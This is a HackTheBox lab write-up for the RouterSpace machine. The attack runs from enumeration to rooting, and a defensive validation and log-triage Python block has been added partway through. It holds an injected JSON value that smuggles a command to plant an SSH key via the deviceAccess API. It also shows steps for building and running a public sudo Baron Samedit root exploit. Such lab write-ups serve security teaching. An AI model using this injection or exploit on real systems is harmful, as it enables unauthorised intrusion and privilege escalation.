Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 26 Feb 2022
IP: 10.10.11.148

HackTheBox's RouterSpace is an easy-level machine.

Enumeration

Nmap scanning result:

# Nmap 7.92 scan initiated Sun Feb 27 05:29:36 2022 as: nmap -sC -sV -oN scan.nmap -vvv 10.10.11.148
Nmap scan report for 10.10.11.148
Host is up, received echo-reply ttl 63 (0.064s latency).
Scanned at 2022-02-27 05:29:37 UTC for 27s
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 (protocol 2.0)
| fingerprint-strings:
| NULL:
|_SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
| ssh-rsa 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
| 256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDiksdoNGb5HSVU5I64JPbS+qDrMnHaxiFkU+JKFH9VnP69mvgdIM9wTDl/WGjeWV2AJsl7NLQQ4W0goFL/Kz48=
| 256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP2psOHQ+E45S1f8MOulwczO6MLHRMr+DYtiyNM0SJw8
80/tcp open http syn-ack ttl 63
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-36197
| Content-Type: text/html; charset=utf-8
| Content-Length: 75
| ETag: W/"4b-KZcRsggwbUpRJYgbfVTb/p3UStY"
| Date: Sun, 27 Feb 2022 05:29:55 GMT
| Connection: close
| Suspicious activity detected !!! {RequestID: Fg ZRH1 qQ R 4nHFujeu }
| GetRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-66742
| Accept-Ranges: bytes
| Cache-Control: public, max-age=0
| Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
| ETag: W/"652c-17d476c9285"
| Content-Type: text/html; charset=UTF-8
| Content-Length: 25900
| Date: Sun, 27 Feb 2022 05:29:55 GMT
| Connection: close
| <!doctype html>
| <html class="no-js" lang="zxx">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>RouterSpace</title>
| <meta name="description" content="">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="stylesheet" href="css/bootstrap.min.css">
| <link rel="stylesheet" href="css/owl.carousel.min.css">
| <link rel="stylesheet" href="css/magnific-popup.css">
| <link rel="stylesheet" href="css/font-awesome.min.css">
| <link rel="stylesheet" href="css/themify-icons.css">
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-97235
| Allow: GET,HEAD,POST
| Content-Type: text/html; charset=utf-8
| Content-Length: 13
| ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
| Date: Sun, 27 Feb 2022 05:29:55 GMT
| Connection: close
| GET,HEAD,POST
| RTSPRequest, X11Probe:
| HTTP/1.1 400 Bad Request
|_Connection: close
|_http-title: RouterSpace
|_http-trane-info: Problem with XML parsing of /evox/about
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 29EA086BA90A060F34EF3D8115988BC1
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.92%I=7%D=2/27%Time=621B0C52%P=x86_64-pc-linux-gnu%r(NULL
SF:,29,"SSH-2\.0-RouterSpace\x20Packet\x20Filtering\x20V1\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.92%I=7%D=2/27%Time=621B0C52%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,31BA,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\n
SF:X-Cdn:\x20RouterSpace-66742\r\nAccept-Ranges:\x20bytes\r\nCache-Control
SF::\x20public,\x20max-age=0\r\nLast-Modified:\x20Mon,\x2022\x20Nov\x20202
SF:1\x2011:33:57\x20GMT\r\nETag:\x20W/\"652c-17d476c9285\"\r\nContent-Type
SF::\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x2025900\r\nDate:\x
SF:20Sun,\x2027\x20Feb\x202022\x2005:29:55\x20GMT\r\nConnection:\x20close\
SF:r\n\r\n<!doctype\x20html>\n<html\x20class=\"no-js\"\x20lang=\"zxx\">\n<
SF:head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<me
SF:ta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x20\x20\
SF:x20\x20<title>RouterSpace</title>\n\x20\x20\x20\x20<meta\x20name=\"desc
SF:ription\"\x20content=\"\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\
SF:x20content=\"width=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\
SF:x20<link\x20rel=\"stylesheet\"\x20href=\"css/bootstrap\.min\.css\">\n\x
SF:20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/owl\.carousel\.
SF:min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"css/
SF:magnific-popup\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20
SF:href=\"css/font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"st
SF:ylesheet\"\x20href=\"css/themify-icons\.css\">\n\x20")%r(HTTPOptions,10
SF:8,"HTTP/1\.1\x20200\x20OK\r\nX-Powered-By:\x20RouterSpace\r\nX-Cdn:\x20
SF:RouterSpace-97235\r\nAllow:\x20GET,HEAD,POST\r\nContent-Type:\x20text/h
SF:tml;\x20charset=utf-8\r\nContent-Length:\x2013\r\nETag:\x20W/\"d-bMedpZ
SF:YGrVt1nR4x\+qdNZ2GqyRo\"\r\nDate:\x20Sun,\x2027\x20Feb\x202022\x2005:29
SF::55\x20GMT\r\nConnection:\x20close\r\n\r\nGET,HEAD,POST")%r(RTSPRequest
SF:,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n
SF:")%r(X11Probe,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20
SF:close\r\n\r\n")%r(FourOhFourRequest,131,"HTTP/1\.1\x20200\x20OK\r\nX-Po
SF:wered-By:\x20RouterSpace\r\nX-Cdn:\x20RouterSpace-36197\r\nContent-Type
SF::\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2075\r\nETag:\x20W
SF:/\"4b-KZcRsggwbUpRJYgbfVTb/p3UStY\"\r\nDate:\x20Sun,\x2027\x20Feb\x2020
SF:22\x2005:29:55\x20GMT\r\nConnection:\x20close\r\n\r\nSuspicious\x20acti
SF:vity\x20detected\x20!!!\x20{RequestID:\x20Fg\x20\x20ZRH1\x20qQ\x20R\x20
SF:4nHFujeu\x20}\n\n\n\n\n\n");

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 27 05:30:04 2022 -- 1 IP address (1 host up) scanned in 27.58 seconds

Foothold

Let's open the webpage in a browser.

Then download http://10.10.11.148/RouterSpace.apk from the webpage.

I uploaded this APK to MobSF, but nothing interesting came up.

So I decided to install the APK in an Android emulator and then try to intercept its requests.

I use Android Studio, but you can use any emulator you want.

If you don't know how to intercept requests from an emulator, check out this guide: https://medium.com/@bastian.ohm/analyse-network-traffic-with-burp-suite-on-android-3cefbf02af2e


Let's add routerspace.htb to /etc/hosts.

User Flag

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 16
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate

{"ip":"10.10.14.xx"}

I changed the IP to mine and received a request from routerspace.htb.

tcpdump -i tun0 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
01:08:51.272117 IP infosec.52882 > routerspace.htb.http: Flags [S], seq 2011016043, win 64240, options [mss 1460,sackOK,TS val 1432270006 ecr 0,nop,wscale 7], length 0
01:08:51.313977 IP routerspace.htb.http > infosec.52882: Flags [S.], seq 2413504831, ack 2011016044, win 65160, options [mss 1285,sackOK,TS val 79265623 ecr 1432270006,nop,wscale 7], length 0
01:08:51.314012 IP infosec.52882 > routerspace.htb.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 1432270048 ecr 79265623], length 0
01:08:51.314181 IP infosec.52882 > routerspace.htb.http: Flags [P.], seq 1:286, ack 1, win 502, options [nop,nop,TS val 1432270048 ecr 79265623], length 285: HTTP: POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
01:08:51.354819 IP routerspace.htb.http > infosec.52882: Flags [.], ack 286, win 507, options [nop,nop,TS val 79265664 ecr 1432270048], length 0
01:08:51.359955 IP routerspace.htb.http > infosec.52882: Flags [P.], seq 1:252, ack 286, win 507, options [nop,nop,TS val 79265669 ecr 1432270048], length 251: HTTP: HTTP/1.1 200 OK
01:08:51.359973 IP infosec.52882 > routerspace.htb.http: Flags [.], ack 252, win 501, options [nop,nop,TS val 1432270094 ecr 79265669], length 0
01:08:51.360218 IP routerspace.htb.http > infosec.52882: Flags [F.], seq 252, ack 286, win 507, options [nop,nop,TS val 79265669 ecr 1432270048], length 0
01:08:51.361783 IP infosec.52882 > routerspace.htb.http: Flags [F.], seq 286, ack 253, win 501, options [nop,nop,TS val 1432270096 ecr 79265669], length 0
01:08:51.402351 IP routerspace.htb.http > infosec.52882: Flags [.], ack 287, win 507, options [nop,nop,TS val 79265712 ecr 1432270096], length 0
10 packets captured
10 packets received by filter
0 packets dropped by kernel

Let's try some commands.


It was successful.

Create a listener on port 1234:

nc -lvnkp 1234
Listening on 0.0.0.0 1234

Then send a request with a bash reverse shell payload; it fails.

I looked for the ssh key but couldn’t find it.

As a result, I added my ssh public key to the target machine.

POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1
accept: application/json, text/plain, */*
user-agent: RouterSpaceAgent
Content-Type: application/json
Content-Length: 619
Host: routerspace.htb
Connection: close
Accept-Encoding: gzip, deflate

{"ip":"10.10.14.xx; echo 'ssh-rsa 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 root@infosec' > ~/.ssh/authorized_keys"}
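The request above works because whatever is sent in the ip field reaches a shell unchanged, so a ';' ends the intended command and starts a new one. As an added example (not RouterSpace's code; the ping command behind the endpoint is an assumption), here is the vulnerable pattern beside a hardened validator, plus a triage helper that flags request bodies like the ones in this writeup when reviewing logs:

```python
import ipaddress
import json
import re

# Constructed sample bodies, modelled on the deviceAccess requests in this writeup.
BENIGN_BODY = '{"ip":"10.10.14.5"}'
INJECTED_BODY = '{"ip":"10.10.14.5; echo ssh-rsa-KEY > ~/.ssh/authorized_keys"}'

# Shell metacharacters that never belong in an IP address field; used for log review.
SHELL_META = re.compile(r"[;&|`$(){}<>\\\n]")


def vulnerable_command(ip):
    """Assumed shape of the bug (not RouterSpace's real code): the untrusted ip is
    pasted into a command string that a shell then parses, so ';' ends the command."""
    return "ping -c 1 " + ip


def validate_ip(value):
    """Return the canonical address, or None unless value is exactly one IP address."""
    if not isinstance(value, str):
        return None
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        return None


def safe_command(ip):
    """Hardened form: the value must parse as an IP, and the command is an argv list
    to be run with subprocess.run(argv) (shell=False), so nothing re-parses it."""
    addr = validate_ip(ip)
    if addr is None:
        raise ValueError("ip must be a single IPv4/IPv6 address")
    return ["ping", "-c", "1", addr]


def triage_body(raw):
    """Classify a logged JSON body: 'ok', 'reject' (not a bare IP) or
    'alert' (shell metacharacters present, i.e. an injection attempt)."""
    try:
        ip = json.loads(raw).get("ip")
    except (ValueError, AttributeError):
        return "reject"
    if isinstance(ip, str) and SHELL_META.search(ip):
        return "alert"
    return "ok" if validate_ip(ip) else "reject"
```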

ssh paul@routerspace.htb 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue 19 Apr 2022 02:19:35 AM UTC

System load: 0.08
Usage of /: 70.7% of 3.49GB
Memory usage: 16%
Swap usage: 0%
Processes: 223
Users logged in: 0
IPv4 address for eth0: 10.10.11.148
IPv6 address for eth0: dead:beef::250:56ff:feb9:9e4e

* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.

https://ubuntu.com/blog/microk8s-memory-optimisation

80 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sat Nov 20 18:30:35 2021 from 192.168.150.133
paul@routerspace:~$ cat user.txt
eba216e20a9938dc19f08cbb7eb4xxxx
paul@routerspace:~$

Got the user flag.

Root Flag

After running the linpeas.sh script, it indicates that the installed sudo version is vulnerable:

paul@routerspace:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
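To make the version check above repeatable, here is an added example (not from the writeup or the linked repositories) that parses `sudo --version` output and tests it against the affected ranges stated in the Qualys advisory for CVE-2021-3156: legacy 1.8.2 through 1.8.31p2 and stable 1.9.0 through 1.9.5p1.

```python
import re

# Constructed from the `sudo --version` output shown above.
SUDO_VERSION_OUTPUT = """Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
"""

# Affected ranges from the Qualys advisory, as (major, minor, patch, plevel) tuples,
# both ends inclusive: 1.8.2 .. 1.8.31p2 and 1.9.0 .. 1.9.5p1.
AFFECTED_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
]


def parse_sudo_version(text):
    """Extract 'Sudo version X.Y.Z[pN]' as (X, Y, Z, N); N is 0 when no patch level."""
    m = re.search(r"^Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text, re.MULTILINE)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_baron_samedit_affected(version):
    """True when the version tuple lies inside one of the published affected ranges."""
    return any(low <= version <= high for low, high in AFFECTED_RANGES)


def check_sudo_output(text):
    """Parse raw `sudo --version` output and report whether the range check hits."""
    version = parse_sudo_version(text)
    return {"version": version, "affected": is_baron_samedit_affected(version)}
```

Distributions such as Ubuntu backport the fix without changing the reported upstream version, so a hit here means "confirm against the package changelog", not "confirmed vulnerable".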

I used this repo https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit.git

git clone https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit.git
Cloning into 'Sudo-1.8.31-Root-Exploit'...
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 9 (delta 0), reused 6 (delta 0), pack-reused 0
Receiving objects: 100% (9/9), done.

Copy the exploit files to the target machine and run the exploit file.

scp -r Sudo-1.8.31-Root-Exploit paul@routerspace.htb:/tmp/sudo
paul@routerspace:~$ cd /tmp/sudo/
paul@routerspace:/tmp/sudo$ make
mkdir libnss_x
cc -O3 -shared -nostdlib -o libnss_x/x.so.2 shellcode.c
cc -O3 -o exploit exploit.c
paul@routerspace:/tmp/sudo$ ./exploit 
# id
uid=0(root) gid=0(root) groups=0(root),1001(paul)
# cat /root/root.txt
0600eed8a854681276020a878a84xxxx